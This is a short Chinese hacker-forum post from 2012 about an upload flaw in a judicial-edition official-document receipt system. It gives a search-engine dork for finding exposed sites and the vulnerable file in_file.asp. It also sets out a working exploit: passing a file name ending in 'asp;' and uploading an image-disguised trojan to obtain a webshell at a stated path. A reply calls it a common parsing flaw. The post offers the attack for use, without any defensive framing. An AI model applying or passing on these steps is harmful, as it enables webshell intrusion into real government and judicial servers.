查看: 10607|回复: 1

[其他专区] 网纪互联公文签收系统司法版通杀上传漏洞

[复制链接]

该用户从未签到

发表于 2012-6-21 07:35:32 | 显示全部楼层 |阅读模式

google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞通杀
in_file.asp?file_name=xiaolu.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/xiaolu.asp;.jpg
回复

使用道具 举报

该用户从未签到

发表于 2012-9-14 17:22:19 | 显示全部楼层
一般解析漏洞
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-12-22 10:22 , Processed in 0.019108 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部